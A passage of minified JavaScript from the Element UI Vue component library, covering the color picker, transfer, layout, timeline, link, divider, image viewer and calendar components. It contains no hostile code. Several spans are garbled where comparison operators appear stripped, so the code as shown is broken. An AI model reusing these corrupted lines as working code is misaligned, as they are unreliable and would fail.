s=e.clientX-t.left;s=Math.max(i.offsetWidth/2,s),s=Math.min(s,t.width-i.offsetWidth/2),this.color.set("alpha",Math.round((s-i.offsetWidth/2)/(t.width-i.offsetWidth)*100))}},getThumbLeft:function(){if(this.vertical)return 0;var e=this.$el,t=this.color._alpha;if(!e)return 0;var i=this.$refs.thumb;return Math.round(t*(e.offsetWidth-i.offsetWidth/2)/100)},getThumbTop:function(){if(!this.vertical)return 0;var e=this.$el,t=this.color._alpha;if(!e)return 0;var i=this.$refs.thumb;return Math.round(t*(e.offsetHeight-i.offsetHeight/2)/100)},getBackground:function(){if(this.color&&this.color.value){var e=this.color.toRgb(),t=e.r,i=e.g,n=e.b;return"linear-gradient(to right, rgba("+t+", "+i+", "+n+", 0) 0%, rgba("+t+", "+i+", "+n+", 1) 100%)"}return null},update:function(){this.thumbLeft=this.getThumbLeft(),this.thumbTop=this.getThumbTop(),this.background=this.getBackground()}},data:function(){return{thumbLeft:0,thumbTop:0,background:null}},mounted:function(){var e=this,t=this.$refs,i=t.bar,n=t.thumb,s={drag:function(t){e.handleDrag(t)},end:function(t){e.handleDrag(t)}};ef(i,s),ef(n,s),this.update()}},mf=ff,vf=o(mf,df,pf,!1,null,null,null);vf.options.__file="packages/color-picker/src/components/alpha-slider.vue";var gf=vf.exports,bf=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-color-predefine"},[i("div",{staticClass:"el-color-predefine__colors"},e._l(e.rgbaColors,(function(t,n){return i("div",{key:e.colors[n],staticClass:"el-color-predefine__color-selector",class:{selected:t.selected,"is-alpha":t._alpha<100},on:{click:function(t){e.handleSelect(n)}}},[i("div",{style:{"background-color":t.value}})])})),0)])},yf=[];bf._withStripped=!0;var _f={props:{colors:{type:Array,required:!0},color:{required:!0}},data:function(){return{rgbaColors:this.parseColors(this.colors,this.color)}},methods:{handleSelect:function(e){this.color.fromString(this.colors[e])},parseColors:function(e,t){return e.map((function(e){var i=new Up;return i.enableAlpha=!0,i.format="rgba",i.fromString(e),i.selected=i.value===t.value,i}))}},watch:{"$parent.currentColor":function(e){var t=new Up;t.fromString(e),this.rgbaColors.forEach((function(e){e.selected=t.compare(e)}))},colors:function(e){this.rgbaColors=this.parseColors(e,this.color)},color:function(e){this.rgbaColors=this.parseColors(this.colors,e)}}},xf=_f,Cf=o(xf,bf,yf,!1,null,null,null);Cf.options.__file="packages/color-picker/src/components/predefine.vue";var wf=Cf.exports,kf={name:"el-color-picker-dropdown",mixins:[H.a,g.a],components:{SvPanel:rf,HueSlider:hf,AlphaSlider:gf,ElInput:m.a,ElButton:ae.a,Predefine:wf},props:{color:{required:!0},showAlpha:Boolean,predefine:Array},data:function(){return{customInput:""}},computed:{currentColor:function(){var e=this.$parent;return e.value||e.showPanelColor?e.color.value:""}},methods:{confirmValue:function(){this.$emit("pick")},handleConfirm:function(){this.color.fromString(this.customInput)}},mounted:function(){this.$parent.popperElm=this.popperElm=this.$el,this.referenceElm=this.$parent.$el},watch:{showPopper:function(e){var t=this;!0===e&&this.$nextTick((function(){var e=t.$refs,i=e.sl,n=e.hue,s=e.alpha;i&&i.update(),n&&n.update(),s&&s.update()}))},currentColor:{immediate:!0,handler:function(e){this.customInput=e}}}},Sf=kf,Df=o(Sf,Gp,Xp,!1,null,null,null);Df.options.__file="packages/color-picker/src/components/picker-dropdown.vue";var $f=Df.exports,Of={name:"ElColorPicker",mixins:[O.a],props:{value:String,showAlpha:Boolean,colorFormat:String,disabled:Boolean,size:String,popperClass:String,predefine:Array},inject:{elForm:{default:""},elFormItem:{default:""}},directives:{Clickoutside:V.a},computed:{displayedColor:function(){return this.value||this.showPanelColor?this.displayedRgb(this.color,this.showAlpha):"transparent"},_elFormItemSize:function(){return(this.elFormItem||{}).elFormItemSize},colorSize:function(){return this.size||this._elFormItemSize||(this.$ELEMENT||{}).size},colorDisabled:function(){return this.disabled||(this.elForm||{}).disabled}},watch:{value:function(e){e?e&&e!==this.color.value&&this.color.fromString(e):this.showPanelColor=!1},color:{deep:!0,handler:function(){this.showPanelColor=!0}},displayedColor:function(e){if(this.showPicker){var t=new Up({enableAlpha:this.showAlpha,format:this.colorFormat});t.fromString(this.value);var i=this.displayedRgb(t,this.showAlpha);e!==i&&this.$emit("active-change",e)}}},methods:{handleTrigger:function(){this.colorDisabled||(this.showPicker=!this.showPicker)},confirmValue:function(){var e=this.color.value;this.$emit("input",e),this.$emit("change",e),this.dispatch("ElFormItem","el.form.change",e),this.showPicker=!1},clearValue:function(){this.$emit("input",null),this.$emit("change",null),null!==this.value&&this.dispatch("ElFormItem","el.form.change",null),this.showPanelColor=!1,this.showPicker=!1,this.resetColor()},hide:function(){this.showPicker=!1,this.resetColor()},resetColor:function(){var e=this;this.$nextTick((function(t){e.value?e.color.fromString(e.value):e.showPanelColor=!1}))},displayedRgb:function(e,t){if(!(e instanceof Up))throw Error("color should be instance of Color Class");var i=e.toRgb(),n=i.r,s=i.g,r=i.b;return t?"rgba("+n+", "+s+", "+r+", "+e.get("alpha")/100+")":"rgb("+n+", "+s+", "+r+")"}},mounted:function(){var e=this.value;e&&this.color.fromString(e),this.popperElm=this.$refs.dropdown.$el},data:function(){var e=new Up({enableAlpha:this.showAlpha,format:this.colorFormat});return{color:e,showPicker:!1,showPanelColor:!1}},components:{PickerDropdown:$f}},Ef=Of,Tf=o(Ef,Mp,Np,!1,null,null,null);Tf.options.__file="packages/color-picker/src/main.vue";var Pf=Tf.exports;Pf.install=function(e){e.component(Pf.name,Pf)};var Mf=Pf,Nf=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-transfer"},[i("transfer-panel",e._b({ref:"leftPanel",attrs:{data:e.sourceData,title:e.titles[0]||e.t("el.transfer.titles.0"),"default-checked":e.leftDefaultChecked,placeholder:e.filterPlaceholder||e.t("el.transfer.filterPlaceholder")},on:{"checked-change":e.onSourceCheckedChange}},"transfer-panel",e.$props,!1),[e._t("left-footer")],2),i("div",{staticClass:"el-transfer__buttons"},[i("el-button",{class:["el-transfer__button",e.hasButtonTexts?"is-with-texts":""],attrs:{type:"primary",disabled:0===e.rightChecked.length},nativeOn:{click:function(t){return e.addToLeft(t)}}},[i("i",{staticClass:"el-icon-arrow-left"}),void 0!==e.buttonTexts[0]?i("span",[e._v(e._s(e.buttonTexts[0]))]):e._e()]),i("el-button",{class:["el-transfer__button",e.hasButtonTexts?"is-with-texts":""],attrs:{type:"primary",disabled:0===e.leftChecked.length},nativeOn:{click:function(t){return e.addToRight(t)}}},[void 0!==e.buttonTexts[1]?i("span",[e._v(e._s(e.buttonTexts[1]))]):e._e(),i("i",{staticClass:"el-icon-arrow-right"})])],1),i("transfer-panel",e._b({ref:"rightPanel",attrs:{data:e.targetData,title:e.titles[1]||e.t("el.transfer.titles.1"),"default-checked":e.rightDefaultChecked,placeholder:e.filterPlaceholder||e.t("el.transfer.filterPlaceholder")},on:{"checked-change":e.onTargetCheckedChange}},"transfer-panel",e.$props,!1),[e._t("right-footer")],2)],1)},If=[];Nf._withStripped=!0;var jf=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-transfer-panel"},[i("p",{staticClass:"el-transfer-panel__header"},[i("el-checkbox",{attrs:{indeterminate:e.isIndeterminate},on:{change:e.handleAllCheckedChange},model:{value:e.allChecked,callback:function(t){e.allChecked=t},expression:"allChecked"}},[e._v("\n "+e._s(e.title)+"\n "),i("span",[e._v(e._s(e.checkedSummary))])])],1),i("div",{class:["el-transfer-panel__body",e.hasFooter?"is-with-footer":""]},[e.filterable?i("el-input",{staticClass:"el-transfer-panel__filter",attrs:{size:"small",placeholder:e.placeholder},nativeOn:{mouseenter:function(t){e.inputHover=!0},mouseleave:function(t){e.inputHover=!1}},model:{value:e.query,callback:function(t){e.query=t},expression:"query"}},[i("i",{class:["el-input__icon","el-icon-"+e.inputIcon],attrs:{slot:"prefix"},on:{click:e.clearQuery},slot:"prefix"})]):e._e(),i("el-checkbox-group",{directives:[{name:"show",rawName:"v-show",value:!e.hasNoMatch&&e.data.length>0,expression:"!hasNoMatch && data.length > 0"}],staticClass:"el-transfer-panel__list",class:{"is-filterable":e.filterable},model:{value:e.checked,callback:function(t){e.checked=t},expression:"checked"}},e._l(e.filteredData,(function(t){return i("el-checkbox",{key:t[e.keyProp],staticClass:"el-transfer-panel__item",attrs:{label:t[e.keyProp],disabled:t[e.disabledProp]}},[i("option-content",{attrs:{option:t}})],1)})),1),i("p",{directives:[{name:"show",rawName:"v-show",value:e.hasNoMatch,expression:"hasNoMatch"}],staticClass:"el-transfer-panel__empty"},[e._v(e._s(e.t("el.transfer.noMatch")))]),i("p",{directives:[{name:"show",rawName:"v-show",value:0===e.data.length&&!e.hasNoMatch,expression:"data.length === 0 && !hasNoMatch"}],staticClass:"el-transfer-panel__empty"},[e._v(e._s(e.t("el.transfer.noData")))])],1),e.hasFooter?i("p",{staticClass:"el-transfer-panel__footer"},[e._t("default")],2):e._e()])},Ff=[];jf._withStripped=!0;var Lf={mixins:[g.a],name:"ElTransferPanel",componentName:"ElTransferPanel",components:{ElCheckboxGroup:Ms.a,ElCheckbox:In.a,ElInput:m.a,OptionContent:{props:{option:Object},render:function(e){var t=function e(t){return"ElTransferPanel"===t.$options.componentName?t:t.$parent?e(t.$parent):t},i=t(this),n=i.$parent||i;return i.renderContent?i.renderContent(e,this.option):n.$scopedSlots.default?n.$scopedSlots.default({option:this.option}):e("span",[this.option[i.labelProp]||this.option[i.keyProp]])}}},props:{data:{type:Array,default:function(){return[]}},renderContent:Function,placeholder:String,title:String,filterable:Boolean,format:Object,filterMethod:Function,defaultChecked:Array,props:Object},data:function(){return{checked:[],allChecked:!1,query:"",inputHover:!1,checkChangeByUser:!0}},watch:{checked:function(e,t){if(this.updateAllChecked(),this.checkChangeByUser){var i=e.concat(t).filter((function(i){return-1===e.indexOf(i)||-1===t.indexOf(i)}));this.$emit("checked-change",e,i)}else this.$emit("checked-change",e),this.checkChangeByUser=!0},data:function(){var e=this,t=[],i=this.filteredData.map((function(t){return t[e.keyProp]}));this.checked.forEach((function(e){i.indexOf(e)>-1&&t.push(e)})),this.checkChangeByUser=!1,this.checked=t},checkableData:function(){this.updateAllChecked()},defaultChecked:{immediate:!0,handler:function(e,t){var i=this;if(!t||e.length!==t.length||!e.every((function(e){return t.indexOf(e)>-1}))){var n=[],s=this.checkableData.map((function(e){return e[i.keyProp]}));e.forEach((function(e){s.indexOf(e)>-1&&n.push(e)})),this.checkChangeByUser=!1,this.checked=n}}}},computed:{filteredData:function(){var e=this;return this.data.filter((function(t){if("function"===typeof e.filterMethod)return e.filterMethod(e.query,t);var i=t[e.labelProp]||t[e.keyProp].toString();return i.toLowerCase().indexOf(e.query.toLowerCase())>-1}))},checkableData:function(){var e=this;return this.filteredData.filter((function(t){return!t[e.disabledProp]}))},checkedSummary:function(){var e=this.checked.length,t=this.data.length,i=this.format,n=i.noChecked,s=i.hasChecked;return n&&s?e>0?s.replace(/\${checked}/g,e).replace(/\${total}/g,t):n.replace(/\${total}/g,t):e+"/"+t},isIndeterminate:function(){var e=this.checked.length;return e>0&&e0&&0===this.filteredData.length},inputIcon:function(){return this.query.length>0&&this.inputHover?"circle-close":"search"},labelProp:function(){return this.props.label||"label"},keyProp:function(){return this.props.key||"key"},disabledProp:function(){return this.props.disabled||"disabled"},hasFooter:function(){return!!this.$slots.default}},methods:{updateAllChecked:function(){var e=this,t=this.checkableData.map((function(t){return t[e.keyProp]}));this.allChecked=t.length>0&&t.every((function(t){return e.checked.indexOf(t)>-1}))},handleAllCheckedChange:function(e){var t=this;this.checked=e?this.checkableData.map((function(e){return e[t.keyProp]})):[]},clearQuery:function(){"circle-close"===this.inputIcon&&(this.query="")}}},Af=Lf,Vf=o(Af,jf,Ff,!1,null,null,null);Vf.options.__file="packages/transfer/src/transfer-panel.vue";var Bf=Vf.exports,zf={name:"ElTransfer",mixins:[O.a,g.a,D.a],components:{TransferPanel:Bf,ElButton:ae.a},props:{data:{type:Array,default:function(){return[]}},titles:{type:Array,default:function(){return[]}},buttonTexts:{type:Array,default:function(){return[]}},filterPlaceholder:{type:String,default:""},filterMethod:Function,leftDefaultChecked:{type:Array,default:function(){return[]}},rightDefaultChecked:{type:Array,default:function(){return[]}},renderContent:Function,value:{type:Array,default:function(){return[]}},format:{type:Object,default:function(){return{}}},filterable:Boolean,props:{type:Object,default:function(){return{label:"label",key:"key",disabled:"disabled"}}},targetOrder:{type:String,default:"original"}},data:function(){return{leftChecked:[],rightChecked:[]}},computed:{dataObj:function(){var e=this.props.key;return this.data.reduce((function(t,i){return(t[i[e]]=i)&&t}),{})},sourceData:function(){var e=this;return this.data.filter((function(t){return-1===e.value.indexOf(t[e.props.key])}))},targetData:function(){var e=this;return"original"===this.targetOrder?this.data.filter((function(t){return e.value.indexOf(t[e.props.key])>-1})):this.value.reduce((function(t,i){var n=e.dataObj[i];return n&&t.push(n),t}),[])},hasButtonTexts:function(){return 2===this.buttonTexts.length}},watch:{value:function(e){this.dispatch("ElFormItem","el.form.change",e)}},methods:{getMigratingConfig:function(){return{props:{"footer-format":"footer-format is renamed to format."}}},onSourceCheckedChange:function(e,t){this.leftChecked=e,void 0!==t&&this.$emit("left-check-change",e,t)},onTargetCheckedChange:function(e,t){this.rightChecked=e,void 0!==t&&this.$emit("right-check-change",e,t)},addToLeft:function(){var e=this.value.slice();this.rightChecked.forEach((function(t){var i=e.indexOf(t);i>-1&&e.splice(i,1)})),this.$emit("input",e),this.$emit("change",e,"left",this.rightChecked)},addToRight:function(){var e=this,t=this.value.slice(),i=[],n=this.props.key;this.data.forEach((function(t){var s=t[n];e.leftChecked.indexOf(s)>-1&&-1===e.value.indexOf(s)&&i.push(s)})),t="unshift"===this.targetOrder?i.concat(t):t.concat(i),this.$emit("input",t),this.$emit("change",t,"right",this.leftChecked)},clearQuery:function(e){"left"===e?this.$refs.leftPanel.query="":"right"===e&&(this.$refs.rightPanel.query="")}}},Rf=zf,Hf=o(Rf,Nf,If,!1,null,null,null);Hf.options.__file="packages/transfer/src/main.vue";var Wf=Hf.exports;Wf.install=function(e){e.component(Wf.name,Wf)};var qf=Wf,Yf=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("section",{staticClass:"el-container",class:{"is-vertical":e.isVertical}},[e._t("default")],2)},Kf=[];Yf._withStripped=!0;var Uf={name:"ElContainer",componentName:"ElContainer",props:{direction:String},computed:{isVertical:function(){return"vertical"===this.direction||"horizontal"!==this.direction&&(!(!this.$slots||!this.$slots.default)&&this.$slots.default.some((function(e){var t=e.componentOptions&&e.componentOptions.tag;return"el-header"===t||"el-footer"===t})))}}},Gf=Uf,Xf=o(Gf,Yf,Kf,!1,null,null,null);Xf.options.__file="packages/container/src/main.vue";var Zf=Xf.exports;Zf.install=function(e){e.component(Zf.name,Zf)};var Qf=Zf,Jf=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("header",{staticClass:"el-header",style:{height:e.height}},[e._t("default")],2)},em=[];Jf._withStripped=!0;var tm={name:"ElHeader",componentName:"ElHeader",props:{height:{type:String,default:"60px"}}},im=tm,nm=o(im,Jf,em,!1,null,null,null);nm.options.__file="packages/header/src/main.vue";var sm=nm.exports;sm.install=function(e){e.component(sm.name,sm)};var rm=sm,am=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("aside",{staticClass:"el-aside",style:{width:e.width}},[e._t("default")],2)},om=[];am._withStripped=!0;var lm={name:"ElAside",componentName:"ElAside",props:{width:{type:String,default:"300px"}}},cm=lm,um=o(cm,am,om,!1,null,null,null);um.options.__file="packages/aside/src/main.vue";var hm=um.exports;hm.install=function(e){e.component(hm.name,hm)};var dm=hm,pm=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("main",{staticClass:"el-main"},[e._t("default")],2)},fm=[];pm._withStripped=!0;var mm={name:"ElMain",componentName:"ElMain"},vm=mm,gm=o(vm,pm,fm,!1,null,null,null);gm.options.__file="packages/main/src/main.vue";var bm=gm.exports;bm.install=function(e){e.component(bm.name,bm)};var ym=bm,_m=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("footer",{staticClass:"el-footer",style:{height:e.height}},[e._t("default")],2)},xm=[];_m._withStripped=!0;var Cm={name:"ElFooter",componentName:"ElFooter",props:{height:{type:String,default:"60px"}}},wm=Cm,km=o(wm,_m,xm,!1,null,null,null);km.options.__file="packages/footer/src/main.vue";var Sm=km.exports;Sm.install=function(e){e.component(Sm.name,Sm)};var Dm,$m,Om=Sm,Em={name:"ElTimeline",props:{reverse:{type:Boolean,default:!1}},provide:function(){return{timeline:this}},render:function(){var e=arguments[0],t=this.reverse,i={"el-timeline":!0,"is-reverse":t},n=this.$slots.default||[];return t&&(n=n.reverse()),e("ul",{class:i},[n])}},Tm=Em,Pm=o(Tm,Dm,$m,!1,null,null,null);Pm.options.__file="packages/timeline/src/main.vue";var Mm=Pm.exports;Mm.install=function(e){e.component(Mm.name,Mm)};var Nm=Mm,Im=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("li",{staticClass:"el-timeline-item"},[i("div",{staticClass:"el-timeline-item__tail"}),e.$slots.dot?e._e():i("div",{staticClass:"el-timeline-item__node",class:["el-timeline-item__node--"+(e.size||""),"el-timeline-item__node--"+(e.type||"")],style:{backgroundColor:e.color}},[e.icon?i("i",{staticClass:"el-timeline-item__icon",class:e.icon}):e._e()]),e.$slots.dot?i("div",{staticClass:"el-timeline-item__dot"},[e._t("dot")],2):e._e(),i("div",{staticClass:"el-timeline-item__wrapper"},[e.hideTimestamp||"top"!==e.placement?e._e():i("div",{staticClass:"el-timeline-item__timestamp is-top"},[e._v("\n "+e._s(e.timestamp)+"\n ")]),i("div",{staticClass:"el-timeline-item__content"},[e._t("default")],2),e.hideTimestamp||"bottom"!==e.placement?e._e():i("div",{staticClass:"el-timeline-item__timestamp is-bottom"},[e._v("\n "+e._s(e.timestamp)+"\n ")])])])},jm=[];Im._withStripped=!0;var Fm={name:"ElTimelineItem",inject:["timeline"],props:{timestamp:String,hideTimestamp:{type:Boolean,default:!1},placement:{type:String,default:"bottom"},type:String,color:String,size:{type:String,default:"normal"},icon:String}},Lm=Fm,Am=o(Lm,Im,jm,!1,null,null,null);Am.options.__file="packages/timeline/src/item.vue";var Vm=Am.exports;Vm.install=function(e){e.component(Vm.name,Vm)};var Bm=Vm,zm=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("a",e._b({class:["el-link",e.type?"el-link--"+e.type:"",e.disabled&&"is-disabled",e.underline&&!e.disabled&&"is-underline"],attrs:{href:e.disabled?null:e.href},on:{click:e.handleClick}},"a",e.$attrs,!1),[e.icon?i("i",{class:e.icon}):e._e(),e.$slots.default?i("span",{staticClass:"el-link--inner"},[e._t("default")],2):e._e(),e.$slots.icon?[e.$slots.icon?e._t("icon"):e._e()]:e._e()],2)},Rm=[];zm._withStripped=!0;var Hm={name:"ElLink",props:{type:{type:String,default:"default"},underline:{type:Boolean,default:!0},disabled:Boolean,href:String,icon:String},methods:{handleClick:function(e){this.disabled||this.href||this.$emit("click",e)}}},Wm=Hm,qm=o(Wm,zm,Rm,!1,null,null,null);qm.options.__file="packages/link/src/main.vue";var Ym=qm.exports;Ym.install=function(e){e.component(Ym.name,Ym)};var Km=Ym,Um=function(e,t){var i=t._c;return i("div",t._g(t._b({class:[t.data.staticClass,"el-divider","el-divider--"+t.props.direction]},"div",t.data.attrs,!1),t.listeners),[t.slots().default&&"vertical"!==t.props.direction?i("div",{class:["el-divider__text","is-"+t.props.contentPosition]},[t._t("default")],2):t._e()])},Gm=[];Um._withStripped=!0;var Xm={name:"ElDivider",props:{direction:{type:String,default:"horizontal",validator:function(e){return-1!==["horizontal","vertical"].indexOf(e)}},contentPosition:{type:String,default:"center",validator:function(e){return-1!==["left","center","right"].indexOf(e)}}}},Zm=Xm,Qm=o(Zm,Um,Gm,!0,null,null,null);Qm.options.__file="packages/divider/src/main.vue";var Jm=Qm.exports;Jm.install=function(e){e.component(Jm.name,Jm)};var ev=Jm,tv=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-image"},[e.loading?e._t("placeholder",[i("div",{staticClass:"el-image__placeholder"})]):e.error?e._t("error",[i("div",{staticClass:"el-image__error"},[e._v(e._s(e.t("el.image.error")))])]):i("img",e._g(e._b({staticClass:"el-image__inner",class:{"el-image__inner--center":e.alignCenter,"el-image__preview":e.preview},style:e.imageStyle,attrs:{src:e.src},on:{click:e.clickHandler}},"img",e.$attrs,!1),e.$listeners)),e.preview?[e.showViewer?i("image-viewer",{attrs:{"z-index":e.zIndex,"initial-index":e.imageIndex,"on-close":e.closeViewer,"url-list":e.previewSrcList}}):e._e()]:e._e()],2)},iv=[];tv._withStripped=!0;var nv=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"viewer-fade"}},[i("div",{ref:"el-image-viewer__wrapper",staticClass:"el-image-viewer__wrapper",style:{"z-index":e.viewerZIndex},attrs:{tabindex:"-1"}},[i("div",{staticClass:"el-image-viewer__mask",on:{click:function(t){return t.target!==t.currentTarget?null:e.handleMaskClick(t)}}}),i("span",{staticClass:"el-image-viewer__btn el-image-viewer__close",on:{click:e.hide}},[i("i",{staticClass:"el-icon-close"})]),e.isSingle?e._e():[i("span",{staticClass:"el-image-viewer__btn el-image-viewer__prev",class:{"is-disabled":!e.infinite&&e.isFirst},on:{click:e.prev}},[i("i",{staticClass:"el-icon-arrow-left"})]),i("span",{staticClass:"el-image-viewer__btn el-image-viewer__next",class:{"is-disabled":!e.infinite&&e.isLast},on:{click:e.next}},[i("i",{staticClass:"el-icon-arrow-right"})])],i("div",{staticClass:"el-image-viewer__btn el-image-viewer__actions"},[i("div",{staticClass:"el-image-viewer__actions__inner"},[i("i",{staticClass:"el-icon-zoom-out",on:{click:function(t){e.handleActions("zoomOut")}}}),i("i",{staticClass:"el-icon-zoom-in",on:{click:function(t){e.handleActions("zoomIn")}}}),i("i",{staticClass:"el-image-viewer__actions__divider"}),i("i",{class:e.mode.icon,on:{click:e.toggleMode}}),i("i",{staticClass:"el-image-viewer__actions__divider"}),i("i",{staticClass:"el-icon-refresh-left",on:{click:function(t){e.handleActions("anticlocelise")}}}),i("i",{staticClass:"el-icon-refresh-right",on:{click:function(t){e.handleActions("clocelise")}}})])]),i("div",{staticClass:"el-image-viewer__canvas"},e._l(e.urlList,(function(t,n){return n===e.index?i("img",{key:t,ref:"img",refInFor:!0,staticClass:"el-image-viewer__img",style:e.imgStyle,attrs:{src:e.currentImg},on:{load:e.handleImgLoad,error:e.handleImgError,mousedown:e.handleMouseDown}}):e._e()})),0)],2)])},sv=[];nv._withStripped=!0;var rv=Object.assign||function(e){for(var t=1;te?this.zIndex:e}},watch:{index:{handler:function(e){this.reset(),this.onSwitch(e)}},currentImg:function(e){var t=this;this.$nextTick((function(e){var i=t.$refs.img[0];i.complete||(t.loading=!0)}))}},methods:{hide:function(){this.deviceSupportUninstall(),this.onClose()},deviceSupportInstall:function(){var e=this;this._keyDownHandler=function(t){t.stopPropagation();var i=t.keyCode;switch(i){case 27:e.hide();break;case 32:e.toggleMode();break;case 37:e.prev();break;case 38:e.handleActions("zoomIn");break;case 39:e.next();break;case 40:e.handleActions("zoomOut");break}},this._mouseWheelHandler=Object(b["rafThrottle"])((function(t){var i=t.wheelDelta?t.wheelDelta:-t.detail;i>0?e.handleActions("zoomIn",{zoomRate:.015,enableTransition:!1}):e.handleActions("zoomOut",{zoomRate:.015,enableTransition:!1})})),Object(Ae["on"])(document,"keydown",this._keyDownHandler),Object(Ae["on"])(document,ov,this._mouseWheelHandler)},deviceSupportUninstall:function(){Object(Ae["off"])(document,"keydown",this._keyDownHandler),Object(Ae["off"])(document,ov,this._mouseWheelHandler),this._keyDownHandler=null,this._mouseWheelHandler=null},handleImgLoad:function(e){this.loading=!1},handleImgError:function(e){this.loading=!1,e.target.alt="加载失败"},handleMouseDown:function(e){var t=this;if(!this.loading&&0===e.button){var i=this.transform,n=i.offsetX,s=i.offsetY,r=e.pageX,a=e.pageY;this._dragHandler=Object(b["rafThrottle"])((function(e){t.transform.offsetX=n+e.pageX-r,t.transform.offsetY=s+e.pageY-a})),Object(Ae["on"])(document,"mousemove",this._dragHandler),Object(Ae["on"])(document,"mouseup",(function(e){Object(Ae["off"])(document,"mousemove",t._dragHandler)})),e.preventDefault()}},handleMaskClick:function(){this.maskClosable&&this.hide()},reset:function(){this.transform={scale:1,deg:0,offsetX:0,offsetY:0,enableTransition:!1}},toggleMode:function(){if(!this.loading){var e=Object.keys(av),t=Object.values(av),i=t.indexOf(this.mode),n=(i+1)%e.length;this.mode=av[e[n]],this.reset()}},prev:function(){if(!this.isFirst||this.infinite){var e=this.urlList.length;this.index=(this.index-1+e)%e}},next:function(){if(!this.isLast||this.infinite){var e=this.urlList.length;this.index=(this.index+1)%e}},handleActions:function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};if(!this.loading){var i=rv({zoomRate:.2,rotateDeg:90,enableTransition:!0},t),n=i.zoomRate,s=i.rotateDeg,r=i.enableTransition,a=this.transform;switch(e){case"zoomOut":a.scale>.2&&(a.scale=parseFloat((a.scale-n).toFixed(3)));break;case"zoomIn":a.scale=parseFloat((a.scale+n).toFixed(3));break;case"clocelise":a.deg+=s;break;case"anticlocelise":a.deg-=s;break}a.enableTransition=r}}},mounted:function(){this.deviceSupportInstall(),this.appendToBody&&document.body.appendChild(this.$el),this.$refs["el-image-viewer__wrapper"].focus()},destroyed:function(){this.appendToBody&&this.$el&&this.$el.parentNode&&this.$el.parentNode.removeChild(this.$el)}},cv=lv,uv=o(cv,nv,sv,!1,null,null,null);uv.options.__file="packages/image/src/image-viewer.vue";var hv=uv.exports,dv=function(){return void 0!==document.documentElement.style.objectFit},pv={NONE:"none",CONTAIN:"contain",COVER:"cover",FILL:"fill",SCALE_DOWN:"scale-down"},fv="",mv={name:"ElImage",mixins:[g.a],inheritAttrs:!1,components:{ImageViewer:hv},props:{src:String,fit:String,lazy:Boolean,scrollContainer:{},previewSrcList:{type:Array,default:function(){return[]}},zIndex:{type:Number,default:2e3}},data:function(){return{loading:!0,error:!1,show:!this.lazy,imageWidth:0,imageHeight:0,showViewer:!1}},computed:{imageStyle:function(){var e=this.fit;return!this.$isServer&&e?dv()?{"object-fit":e}:this.getImageStyle(e):{}},alignCenter:function(){return!this.$isServer&&!dv()&&this.fit!==pv.FILL},preview:function(){var e=this.previewSrcList;return Array.isArray(e)&&e.length>0},imageIndex:function(){var e=0,t=this.previewSrcList.indexOf(this.src);return t>=0&&(e=t),e}},watch:{src:function(e){this.show&&this.loadImage()},show:function(e){e&&this.loadImage()}},mounted:function(){this.lazy?this.addLazyLoadListener():this.loadImage()},beforeDestroy:function(){this.lazy&&this.removeLazyLoadListener()},methods:{loadImage:function(){var e=this;if(!this.$isServer){this.loading=!0,this.error=!1;var t=new Image;t.onload=function(i){return e.handleLoad(i,t)},t.onerror=this.handleError.bind(this),Object.keys(this.$attrs).forEach((function(i){var n=e.$attrs[i];t.setAttribute(i,n)})),t.src=this.src}},handleLoad:function(e,t){this.imageWidth=t.width,this.imageHeight=t.height,this.loading=!1,this.error=!1},handleError:function(e){this.loading=!1,this.error=!0,this.$emit("error",e)},handleLazyLoad:function(){Object(Ae["isInContainer"])(this.$el,this._scrollContainer)&&(this.show=!0,this.removeLazyLoadListener())},addLazyLoadListener:function(){if(!this.$isServer){var e=this.scrollContainer,t=null;t=Object(qh["isHtmlElement"])(e)?e:Object(qh["isString"])(e)?document.querySelector(e):Object(Ae["getScrollContainer"])(this.$el),t&&(this._scrollContainer=t,this._lazyLoadHandler=Ad()(200,this.handleLazyLoad),Object(Ae["on"])(t,"scroll",this._lazyLoadHandler),this.handleLazyLoad())}},removeLazyLoadListener:function(){var e=this._scrollContainer,t=this._lazyLoadHandler;!this.$isServer&&e&&t&&(Object(Ae["off"])(e,"scroll",t),this._scrollContainer=null,this._lazyLoadHandler=null)},getImageStyle:function(e){var t=this.imageWidth,i=this.imageHeight,n=this.$el,s=n.clientWidth,r=n.clientHeight;if(!t||!i||!s||!r)return{};var a=t/i,o=s/r;if(e===pv.SCALE_DOWN){var l=ts)return console.warn("[ElementCalendar]end time should be greater than start time"),[];if(Object(ar["validateRangeInOneMonth"])(n,s))return[[n,s]];var r=[],a=new Date(n.getFullYear(),n.getMonth()+1,1),o=this.toDate(a.getTime()-Mv);if(!Object(ar["validateRangeInOneMonth"])(a,s))return console.warn("[ElementCalendar]start time and end time interval must not exceed two months"),[];r.push([n,o]);var l=this.realFirstDayOfWeek,c=a.getDay(),u=0;return c!==l&&(0===l?u=7-c:(u=l-c,u=u>0?u:7+u)),a=this.toDate(a.getTime()+u*Mv),a.getDate()6?0:Math.floor(this.firstDayOfWeek)}},data:function(){return{selectedDay:"",now:new Date}}},Iv=Nv,jv=o(Iv,_v,xv,!1,null,null,null);jv.options.__file="packages/calendar/src/main.vue";var Fv=jv.exports;Fv.install=function(e){e.component(Fv.name,Fv)};var Lv=Fv,Av=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-fade-in"}},[e.visible?i("div",{staticClass:"el-backtop",style:{right:e.styleRight,bottom:e.styleBottom},on:{click:function(t){return t.stopPropagation(),e.handleClick(t)}}},[e._t("default",[i("el-icon",{attrs:{name:"caret-top"}})])],2):e._e()])},Vv=[];Av._withStripped=!0;var Bv=function(e){return Math.pow(e,3)},zv=function(e){return 